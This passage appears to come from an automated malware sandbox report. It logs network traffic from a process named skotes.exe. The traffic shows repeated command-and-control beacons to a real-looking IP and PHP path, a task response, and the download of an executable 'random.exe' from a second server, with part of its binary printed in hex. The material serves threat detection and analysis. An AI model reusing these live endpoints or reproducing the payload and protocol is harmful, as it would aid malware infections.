                  Sep 25, 2024 10:36:11.877382994 CEST6476980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:11.877382994 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:12.021823883 CEST8064770185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:12.021856070 CEST8064769185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:12.022013903 CEST6476980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:12.022013903 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:12.022192001 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:12.027223110 CEST8064770185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:12.713136911 CEST8064770185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:12.713187933 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.220175028 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.220222950 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.226995945 CEST8064771185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:14.227114916 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.227299929 CEST8064770185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:14.227332115 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.227652073 CEST6477080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:14.232156038 CEST8064771185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:14.959640026 CEST8064771185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:14.959707975 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.582705021 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.582814932 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.587542057 CEST8064773185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:16.587824106 CEST8064771185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:16.587848902 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.587930918 CEST6477180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.588416100 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:16.593136072 CEST8064773185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:17.309568882 CEST8064773185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:17.309634924 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.814224005 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.814677954 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.819456100 CEST8064773185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:18.819489002 CEST8064774185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:18.819608927 CEST6477380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.819608927 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.819691896 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:18.824412107 CEST8064774185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:19.558557987 CEST8064774185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:19.558615923 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.190020084 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.190438032 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.371838093 CEST8064775185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:21.371855021 CEST8064774185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:21.371917009 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.371941090 CEST6477480192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.372128010 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:21.376842976 CEST8064775185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:22.065582991 CEST8064775185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:22.065671921 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.582263947 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.582751989 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.587412119 CEST8064775185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:23.587456942 CEST6477580192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.587584019 CEST8064776185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:23.587642908 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.587848902 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:23.592606068 CEST8064776185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:24.280637026 CEST8064776185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:24.280805111 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.907283068 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.907567978 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.912374973 CEST8064777185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:25.912507057 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.912647963 CEST8064776185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:25.912656069 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.912777901 CEST6477680192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:25.917440891 CEST8064777185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:26.632025003 CEST8064777185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:26.634876966 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.141824007 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.142169952 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.147017956 CEST8064777185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:28.147099972 CEST6477780192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.147104979 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:28.147233009 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.147414923 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:28.152221918 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:29.155380011 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:29.155462027 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:29.155462980 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:29.155503035 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:29.353523016 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:29.353612900 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.783200979 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.783581972 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.788466930 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:30.788492918 CEST8064778185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:30.788547993 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.788585901 CEST6477880192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.788799047 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:30.793557882 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:31.482470036 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:31.482583046 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:33.008665085 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:33.009201050 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:33.311106920 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:33.920727968 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:34.016659021 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:34.061594009 CEST8064780185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.061609030 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.061633110 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.061644077 CEST8064780185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.061943054 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:34.061943054 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:34.062957048 CEST8064779185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.066783905 CEST8064780185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.066874981 CEST6477980192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:34.771907091 CEST8064780185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:34.771977901 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.409311056 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.409604073 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.415472984 CEST8064780185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:36.415487051 CEST8064781185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:36.415566921 CEST6478080192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.415654898 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.415894985 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:36.420692921 CEST8064781185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:37.105528116 CEST8064781185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:37.105590105 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.610268116 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.610595942 CEST6478380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.615448952 CEST8064781185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:38.615509033 CEST8064783185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:38.615556955 CEST6478180192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.615654945 CEST6478380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.616646051 CEST6478380192.168.2.6185.215.113.43
                  Sep 25, 2024 10:36:38.621634007 CEST8064783185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:39.319875956 CEST8064783185.215.113.43192.168.2.6
                  Sep 25, 2024 10:36:39.319946051 CEST6478380192.168.2.6185.215.113.43
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 10:33:17.037029028 CEST5349484162.159.36.2192.168.2.6
                  Sep 25, 2024 10:33:17.531804085 CEST53643121.1.1.1192.168.2.6
                  • 185.215.113.43
                  • 185.215.113.103
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649748185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:07.718255997 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.649749185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:09.240581989 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.649750185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:10.879509926 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:11.607567072 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.649754185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:13.228739023 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.649755185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:14.871412039 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.649756185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:16.379920006 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.664679185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:18.020944118 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:18.732594013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.664680185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:20.540873051 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:21.253525972 CEST385INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 63 33 0d 0a 20 3c 63 3e 31 30 30 30 30 32 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 31 61 30 63 65 37 65 39 66 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 30 30 30 32 36 30 30 32 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 31 66 34 61 34 65 31 61 30 63 65 37 65 39 66 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: c3 <c>1000023001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#1000026002+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58981f4a4e1a0ce7e9f0e5ebf5de04349025080d9#<d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.664681185.215.113.103801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:21.263263941 CEST57OUTGET /steam/random.exe HTTP/1.1
                  Host: 185.215.113.103
                  Sep 25, 2024 10:33:21.971822023 CEST1236INHTTP/1.1 200 OK
                  Date: Wed, 25 Sep 2024 08:33:21 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Last-Modified: Wed, 25 Sep 2024 08:32:53 GMT
                  ETag: "66000-622ed77d44b57"
                  Accept-Ranges: bytes
                  Content-Length: 417792
                  Content-Type: application/x-msdos-program
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b b7 d9 41 0f d6 b7 12 0f d6 b7 12 0f d6 b7 12 60 a0 1c 12 17 d6 b7 12 60 a0 29 12 2f d6 b7 12 60 a0 1d 12 73 d6 b7 12 06 ae 24 12 06 d6 b7 12 0f d6 b6 12 9c d6 b7 12 60 a0 18 12 0e d6 b7 12 60 a0 2d 12 0e d6 b7 12 60 a0 2a 12 0e d6 b7 12 52 69 63 68 0f d6 b7 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 23 49 a2 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 fa 00 00 00 1a 07 02 00 00 00 00 53 38 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 07 02 00 04 00 00 2a 84 06 00 02 00 00 80 00 00 [TRUNCATED]
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KA``)/`s$``-`*RichPEL#IdS8@*dP@0.text" `.rdata@@.data^@.rsrcPZ@@
                  Sep 25, 2024 10:33:21.971889019 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 00 e1 34 ef c6 c3 55 8b ec b8 c8 26 00 00 e8 ac b2 00 00 8b 45 08 8b 08 8b 40 04 89 45 ec a1 20 23 44 00 53 89 45 dc a1 24
                  Data Ascii: 4U&E@E #DSE$#DV3EWEMu(#D]E,#D?EE EE}dE}=u`E@.=uVlA5EEEEEE33=dE\E=
                  Sep 25, 2024 10:33:21.971939087 CEST1236INData Raw: 64 a2 45 02 4b 13 01 00 ff 35 64 a2 45 02 a1 3c 4c 44 00 56 a3 a0 b0 45 02 ff 15 c4 10 41 00 a3 f0 9c 45 02 e8 64 fe ff ff bf 2e 69 01 00 56 56 ff d3 56 ff 15 04 12 41 00 ff 15 98 10 41 00 4f 75 ec 8b 1d bc 10 41 00 39 35 64 a2 45 02 76 5c a1 a0
                  Data Ascii: dEK5dE<LDVEAEd.iVVVAAOuA95dEv\E8KE9=dEu2VEPVVVVAVVVAEPVEPVTAVVAG;=dEr3dE=u2VPVVVVAVAhChC AVVVAG
                  Sep 25, 2024 10:33:21.971973896 CEST1236INData Raw: 00 ae af 62 36 c7 84 24 14 01 00 00 80 c3 94 30 c7 44 24 38 37 7b d3 66 c7 84 24 50 01 00 00 b6 53 5f 17 c7 84 24 9c 00 00 00 a4 58 95 2c c7 84 24 48 01 00 00 f5 29 fd 74 c7 84 24 b4 00 00 00 eb 01 a3 1b c7 44 24 0c 70 9e 5e 24 c7 84 24 90 00 00
                  Data Ascii: b6$0D$87{f$PS_$X,$H)t$D$p^$$sRD$|>$p@u~$dzjv$}D$`?$'z+$oD$X09$?=\$m~$,$\lD$d$@NPO$_#$
                  Sep 25, 2024 10:33:21.972009897 CEST896INData Raw: 84 24 d8 00 00 00 2b d6 ba 47 81 84 24 7c 01 00 00 74 77 c7 47 81 84 24 a0 01 00 00 af 27 d1 2c 81 ac 24 f0 00 00 00 b3 2b 62 45 81 84 24 bc 00 00 00 a5 46 d3 1a 81 84 24 b0 00 00 00 53 ac 85 64 81 44 24 50 38 e2 d5 05 81 ac 24 30 01 00 00 28 48
                  Data Ascii: $+G$|twG$',$+bE$F$SdD$P8$0(H^D$Ds\{$[$j6$hk$|+i9Xl$D;$)Dl$\t>l$H5B$_,B$au$|8"$}]$@&]l$ rtNc$(
                  Sep 25, 2024 10:33:21.972045898 CEST1236INData Raw: 44 24 14 fc 40 33 24 81 44 24 10 31 67 0c 46 81 ac 24 b0 00 00 00 f2 20 14 39 81 44 24 44 84 04 08 1a 81 44 24 4c 76 df 6d 19 81 6c 24 50 ad 3f d1 5b 81 84 24 60 01 00 00 d0 e8 dd 75 81 84 24 a8 00 00 00 f9 8a 59 54 81 84 24 d8 00 00 00 3d c1 4a
                  Data Ascii: D$@3$D$1gF$ 9D$DD$Lvml$P?[$`u$YT$=JZ$0AcSD$0-64&l$\%D$ sCX$X'-D$p4G$oD$Fl$x[$$Ml$P^$05l$8$?t$2:HD$xA%
                  Sep 25, 2024 10:33:21.972079992 CEST1236INData Raw: 44 24 68 32 14 f6 4d 81 6c 24 64 36 91 0b 36 81 6c 24 38 7a d0 fd 23 81 44 24 64 64 a1 79 33 81 84 24 64 01 00 00 a4 f0 12 1e 81 ac 24 dc 00 00 00 af fb eb 6a 81 ac 24 8c 00 00 00 e3 e2 95 71 81 ac 24 a4 01 00 00 d5 52 0d 07 81 44 24 64 9e 46 23
                  Data Ascii: D$h2Ml$d66l$8z#D$ddy3$d$j$q$RD$dF#$d-$e3B2$,$|^H$<Sp$Lb)\$\So6l$Q2K*D$xp5U$p9$*$$4$g$|i$0G
                  Sep 25, 2024 10:33:21.972115040 CEST1236INData Raw: c3 8b ff 55 8b ec 83 ec 10 a1 58 10 44 00 33 c5 89 45 fc 53 56 8b 75 0c f6 46 0c 40 57 0f 85 36 01 00 00 56 e8 ae 1a 00 00 59 bb 18 10 44 00 83 f8 ff 74 2e 56 e8 9d 1a 00 00 59 83 f8 fe 74 22 56 e8 91 1a 00 00 c1 f8 05 56 8d 3c 85 00 c1 45 02 e8
                  Data Ascii: UXD3ESVuF@W6VYDt.VYt"VV<EYY@$$<V`Yt.VTYt"VHV<E8YY@$$<VYt.VYt"VV<EYY
                  Sep 25, 2024 10:33:21.972148895 CEST1236INData Raw: 35 b8 b0 45 02 ff d6 ff 35 b4 b0 45 02 8b d8 89 5d fc ff d6 8b f0 3b f3 0f 82 81 00 00 00 8b fe 2b fb 8d 47 04 83 f8 04 72 75 53 e8 0b 23 00 00 8b d8 8d 47 04 59 3b d8 73 48 b8 00 08 00 00 3b d8 73 02 8b c3 03 c3 3b c3 72 0f 50 ff 75 fc e8 99 22
                  Data Ascii: 5E5E];+GruS#GY;sH;s;rPu"YYuC;r>Pu"YYt/P4DAEu=DAVEE3_^[Vjj !YYVDAEEujX^&3^jhC=jeu
                  Sep 25, 2024 10:33:21.972186089 CEST1236INData Raw: 85 f6 75 0d ff 75 08 e8 23 2e 00 00 59 33 c0 eb 4d 57 eb 30 85 f6 75 01 46 56 ff 75 08 6a 00 ff 35 58 74 44 00 ff 15 4c 11 41 00 8b f8 85 ff 75 5e 39 05 60 74 44 00 74 40 56 e8 22 1c 00 00 59 85 c0 74 1d 83 fe e0 76 cb 56 e8 12 1c 00 00 59 e8 a0
                  Data Ascii: uu#.Y3MW0uFVuj5XtDLAu^9`tDt@V"YtvVY3_^]AP?YwAP'YUVuFuMg}FuV0EeYV.FYyFttu
                  Sep 25, 2024 10:33:21.977611065 CEST1236INData Raw: 0f be c0 89 85 72 ff ff ff e9 b2 00 00 00 66 8b 85 5c ff ff ff 66 83 e0 20 75 18 9b df e0 66 83 e0 20 74 0f c7 85 72 ff ff ff 08 00 00 00 e9 8d 00 00 00 d9 ad 5c ff ff ff 9b c3 66 8b 85 36 fd ff ff 66 25 f0 7f 66 0b c0 74 1b 66 3d f0 7f 74 43 eb
                  Data Ascii: rf\f uf tr\f6f%ftf=tCf6f%f=t0rAAs4A,rAAvAVWlCv8uuz{tu}


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.664683185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
